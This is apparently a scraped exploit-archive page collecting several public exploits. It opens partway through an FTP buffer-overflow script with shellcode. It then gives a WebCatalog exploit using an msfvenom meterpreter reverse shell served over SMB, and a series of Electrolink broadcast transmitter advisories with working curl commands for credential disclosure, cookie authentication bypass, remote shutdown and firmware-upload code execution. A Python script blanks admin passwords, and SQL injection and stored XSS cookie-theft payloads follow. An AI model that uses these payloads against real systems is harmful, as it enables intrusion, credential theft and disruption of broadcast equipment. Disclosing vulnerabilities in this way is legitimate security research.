"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")

shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow

# Change IP/Port as required  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
        print "\nSending evil buffer..."
        s.connect(('192.168.146.135',21))
        data = s.recv(1024)
        s.send('USER anonymous' +'\r\n')
        data = s.recv(1024)
        s.send('PASS anonymous\r\n')
        s.send('pwd ' + shellcode + '\r\n')
        s.close()
        print "\nExploit completed successfully!."
except:
        print "Could not connect to FTP!"
HireHackking 
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  tobias.diehl@bulletproofsi.com
HireHackking 
# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Shujaat Amin (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com 
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: Windows 10

---------------------------POC-----------------------------

1) Go to your routers IP (192.168.0.1)

2) Go to Access control --> Target,rule

3) Click on add new 

5) Type <h1>Hello<h1> in Target Description box

6) Click on Save, and now you can see html injection on the webpage
HireHackking 
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device is vulnerable to a disclosure of clear-text
credentials in login.htm and mail.htm that can allow security
bypass and system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-XXXX
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"
55:<td class=cd31>Admin password</td>
56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>
63:<td class=cd31>Guest password</td>
64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>
C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"
93:<td class=cd31>Server password</td>
94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>
HireHackking 
Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The transmitter is vulnerable to an authentication bypass
vulnerability affecting the Login Cookie. An attacker can set
an arbitrary value except 'NO' to the Login Cookie and have
full system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5791
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"
HireHackking 
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device is vulnerable to a disclosure of clear-text
credentials in controlloLogin.js that can allow security
bypass and system access.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5790
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php


30.06.2023

--


C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"
function verifica() {
        var user = document.getElementById('user').value;
        var password = document.getElementById('password').value;

        //alert(user);

        if(user=='admin' && password=='cozzir'){
                SetCookie('Login','OK',exp);
                window.location.replace("FrameSetCore.html");
        }else{
                SetCookie('Login','NO',exp);
                window.location.replace("login.html");
        }
}
HireHackking 
Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The transmitter is suffering from a Denial of Service (DoS)
scenario. An unauthenticated attacker can reset the board as well
as stop the transmitter operations by sending one GET request to
the command.cgi gateway.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5795
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php


30.06.2023

--


C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)
Success! OK
HireHackking 
#!/usr/bin/env python
#
#
# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal
#
#
# Vendor: Electrolink s.r.l.
# Product web page: https://www.electrolink.com
# Affected version: 10W, 100W, 250W, Compact DAB Transmitter
#                   500W, 1kW, 2kW Medium DAB Transmitter
#                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
#                   100W, 500W, 1kW, 2kW Compact FM Transmitter
#                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
#                   15W - 40kW Digital FM Transmitter
#                   BI, BIII VHF TV Transmitter
#                   10W - 5kW UHF TV Transmitter
#                   Web version: 01.09, 01.08, 01.07
#                   Display version: 1.4, 1.2
#                   Control unit version: 01.06, 01.04, 01.03
#                   Firmware version: 2.1
#
# Summary: Since 1990 Electrolink has been dealing with design and
# manufacturing of advanced technologies for radio and television
# broadcasting. The most comprehensive products range includes: FM
# Transmitters, DAB Transmitters, TV Transmitters for analogue and
# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
# switches, Manual patch panels, RF power meters, Rigid line and
# accessories. A professional solution that meets broadcasters needs
# from small community television or radio to big government networks.
#
# Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
# touch-screen display and in-built state of the art DAB modulator,
# EDI input and GPS receiver. All transmitters are equipped with a
# state-of-the art DAB modulator with excellent performances,
# self-protected and self-controlled amplifiers ensure trouble-free
# non-stop operation.
#
# 100W, 500W, 1kW and 2kW power range available on compact 2U and
# 3U 19" frame. Built-in stereo coder, touch screen display and
# efficient low noise air cooling system. Available models: 3kW,
# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
# with fully broadband solid state amplifiers and an efficient
# low-noise air cooling system.
#
# FM digital modulator with excellent specifications, built-in
# stereo and RDS coder. Digital deviation limiter together with
# ASI and SDI inputs are available. These transmitters are ready
# for ISOFREQUENCY networks.
#
# Available for VHF BI and VHF BIII operation with robust desing
# and user-friendly local and remote control. Multi-standard UHF
# TV transmitters from 10W up to 5kW with efficient low noise air
# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
# and ISDB-Tb available.
#
# Desc: The application is vulnerable to an unauthenticated
# parameter manipulation that allows an attacker to set the
# credentials to blank giving her access to the admin panel.
# Also vulnerable to account takeover and arbitrary password
# change.
#
# Tested on: Mbedthis-Appweb/12.5.0
#            Mbedthis-Appweb/12.0.0
#
#
# Vulnerability discovered by Neurogenesia
# Macedonian Information Security Research & Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5792
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php
#
#
# 30.06.2023
#
#


import datetime
import requests

dt = datetime.datetime.now()
dt = dt.strftime('%d.%m.%Y %H:%M:%S')
nul = ''

print('Starting transmitter exploit at', dt)

ip = input('Enter transmitter ip: ')
if 'http' not in ip:
    ip = 'http://' + ip

ep = '/login.htm'
url = ip + ep

signature = {'Accept-Encoding' : 'gzip, deflate',
             'Accept-Language' : 'ku-MK,en;q=0.1806',
                  'User-Agent' : 'Broadcastso/B.B',
                  'Connection' : 'keep-alive'
             }
# ----------------- Line breaker v0.17 -----------------
postd = {    'adminuser' : nul,
             'guestuser' : nul,
         'adminpassword' : nul,
         'guestpassword' : nul
         }

print('Removing security control...')
r = requests.post(url, data = postd, headers = signature)
if r.status_code == 200:
    print('Done. Go and "Login".')
else:
    print('Error')
exit(-4)
HireHackking 
Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution


Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
                  500W, 1kW, 2kW Medium DAB Transmitter
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
                  100W, 500W, 1kW, 2kW Compact FM Transmitter
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
                  15W - 40kW Digital FM Transmitter
                  BI, BIII VHF TV Transmitter
                  10W - 5kW UHF TV Transmitter
                  Web version: 01.09, 01.08, 01.07
                  Display version: 1.4, 1.2
                  Control unit version: 01.06, 01.04, 01.03
                  Firmware version: 2.1

Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.

Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.

100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.

FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.

Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.

Desc: The device allows access to an unprotected endpoint that
allows MPFS File System binary image upload without authentication.
The MPFS2 file system module provides a light-weight read-only
file system that can be stored in external EEPROM, external
serial Flash, or internal Flash program memory. This file system
serves as the basis for the HTTP2 web server module, but is also
used by the SNMP module and is available to other applications
that require basic read-only storage capabilities. This can be
exploited to overwrite the flash program memory that holds the
web server's main interfaces and execute arbitrary code.

Tested on: Mbedthis-Appweb/12.5.0
           Mbedthis-Appweb/12.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5796
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php

Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html

30.06.2023

--


POST /upload HTTP/1.1
Host: 192.168.150.77:8888
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy
User-Agent: MPFS2_PoC/1.0c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Login=IgnoreMePlsKtnx
Connection: close

------joxypoxy
Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"
Content-Type: application/octet-stream

MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy--


HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>


---

hd htm:
0d 0a 4d 50 46 53 02 01  01 00 8a 43 20 00 00 00  MPFS.......C....
2b 00 00 00 30 00 00 00  02 44 eb 64 00 00 00 00  +...0....D.d....
00 00 69 6e 64 65 78 32  2e 68 74 6d 00 3c 68 74  ..index0.htm.<ht
6d 6c 3e 0d 0a 3c 74 69  74 6c 65 3e 5a 53 4c 3c  ml>..<title>ZSL<
...
...
64 6f 73 21 0d 0a 3c 2f  68 74 6d 6c 3e 0d 0a 2d  dos!..</html>..-

---

MPFS Structure:
     [M][P][F][S]
     [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]
     [Name Hash 0][Name Hash 1]...[Name Hash N]
     [File Record 0][File Record 1]...[File Record N]
     [String 0][String 1]...[String N]
     [File Data 0][File Data 1]...[File Data N]


---

C:\>javaw -jar MPFS2.jar
C:\>mpfs2 -v -l MPFSimg.bin
Version: 2.1
Number of files: 1 (1 regular, 0 index)
Number of dynamic variables: 0

FileRecord 0:
    .StringPtr = 32 index0.htm
    .DataPtr   = 43
    .Len       = 48
    .Timestamp = 2023-08-27T14:39:30Z
    .Flags     = 0
HireHackking 
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
HireHackking 
# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
# Date: 29/09/2023
# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
# Version: 1.0
# Last Update: 31 August 2022
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

# 1: Create user, login and go to profile.php

# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.

# 3: When entering the profile.php page, document.cookie will be reflected every time.

# Author
This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.

# About Rapplex
Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.
Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.
So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. 
"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.


# HTTP Request 

POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
Connection: close

fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update